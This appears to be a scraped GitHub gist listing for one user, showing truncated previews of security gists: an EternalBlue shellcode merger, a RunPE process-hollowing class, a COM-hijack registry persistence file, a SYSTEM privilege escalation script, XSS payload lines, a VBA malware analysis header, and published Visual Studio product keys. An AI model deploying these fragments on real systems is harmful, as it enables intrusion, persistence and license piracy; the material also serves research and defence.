hoangcuongflp hoangcuongflp
hoangcuongflp
/ mem_dump.idc
Last active
December 27, 2018 03:39
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Press Shift + F2 in IDA, and paste this script: | |
| auto file, fname, i, address, size, x; | |
| address = 0x00C20000; | |
| size = 0x30000; | |
| fname = "D:\\Evidence\\abc.bin"; | |
| file = fopen(fname,"wb"); | |
| for (i=0;i<=size;i++,address++) | |
| { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import idautils | |
| import idaapi | |
| def memdump(ea, size, file): | |
| data = idc.GetManyBytes(ea, size) | |
| with open(file, "wb") as fp: | |
| fp.write(data) | |
| print "Memdump Success!" |
hoangcuongflp
/ eternalblue_merge_shellcode.py
Created
August 8, 2018 17:39
Windows x64 and x86 kernel shellcode for eternalblue exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
| import sys | |
| from struct import pack | |
| if len(sys.argv) < 4: | |
| print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0])) | |
| sys.exit() | |
| sc_x86 = open(sys.argv[1], 'rb').read() | |
| sc_x64 = open(sys.argv[2], 'rb').read() |
hoangcuongflp
/ DynamicCallRunPE.cs
Created
August 8, 2018 17:38
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| public static class DynamicCallRunPE | |
| { | |
| private delegate bool CreateProcess_Delegate(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, IntPtr startupInfo, IntPtr processInformation); | |
| private delegate bool ThreadContext_Delegate(IntPtr thread, int[] context); | |
| private delegate bool ProcessMemoryIntPtr_Delegate(IntPtr process, int baseAddress, IntPtr buffer, int bufferSize, int bytesRead); | |
| private delegate bool ProcessMemoryByte_Delegate(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, int bytesRead); |
hoangcuongflp
/ links.txt
Created
February 23, 2018 02:26
— forked from trietptm/links.txt
https://pastebin.com/RhSKYLk9
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Blogs on Computer Security: | |
| https://antelox.blogspot.com/ | |
| http://www.dumpanalysis.org/blog/ | |
| http://www.abuse.ch/ | |
| http://zairon.wordpress.com/ | |
| http://androguard.blogspot.com/ | |
| http://blog.w4kfu.com/ | |
| http://akhenath0n.blogspot.com/ | |
| http://diarrlf.wordpress.com/ |
hoangcuongflp
/ winlogon.reg
Created
February 12, 2018 04:40
— forked from anonymous/winlogon.reg
WinLogon Windows 7 x64 COM Hijack
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00] | |
| @="AtomicRedTeam" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID] | |
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam] | |
| @="AtomicRedTeam" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID] | |
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] |
hoangcuongflp
/ Visual Studio 2017 Enterprise & Professional
Created
February 12, 2018 02:50
— forked from CHEF-KOCH/Visual Studio 2017 Enterprise & Professional
Visual Studio 2017 Enterprise & Professional
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Enterprise: NJVYC-BMHX2-G77MM-4XJMR-6Q8QF | |
| Professional: KBJFW-NXHK6-W4WJM-CRMQB-G3CDH | |
| Keys are generic ones. These are the same from MSDN account. | |
| Product Key : -6Q8QF | |
| Validity : Valid | |
| Product ID : 00369-90000-00000-AA703 | |
| Advanced ID : XXXXX-03699-000-000000-00-1032-9200.0000-0672017 |
hoangcuongflp
/ malware.txt
Created
February 1, 2018 08:26
— forked from JohnLaTwC/malware.txt
[VBA malware uploaded by @JohnLaTwC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## uploaded by @JohnLaTwC | |
| ## sample hash: 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728 | |
| olevba 0.52dev7 - http://decalage.info/python/oletools | |
| Flags Filename | |
| ----------- ----------------------------------------------------------------- | |
| MHT:MASIHB-- 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728 | |
| =============================================================================== | |
| FILE: 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728 | |
| Type: MHTML | |
| ------------------------------------------------------------------------------- |
hoangcuongflp
/ popshellslikeitsatuesday.py
Created
February 1, 2018 07:28
— forked from makelariss/popshellslikeitsatuesday.py
NT AUTHORITY\SYSTEM through Handle Inheritance using Python
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: UTF-8 -*- | |
| import enum, os, sys | |
| # https://twitter.com/highsenburger69 | |
| from ctypes.wintypes import * | |
| from ctypes import * | |
| # These libraries have the APIs we need | |
| kernel32 = WinDLL('kernel32', use_last_error=True) | |
| advapi32 = WinDLL('advapi32', use_last_error=True) | |
| shell32 = WinDLL('shell32', use_last_error=True) | |
| psapi = WinDLL('psapi.dll', use_last_error=True) |
hoangcuongflp
/ 666_lines_of_XSS_vectors.html
Created
November 27, 2017 13:40
— forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API
copied from http://pastebin.com/48WdZR6L
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> |
NewerOlder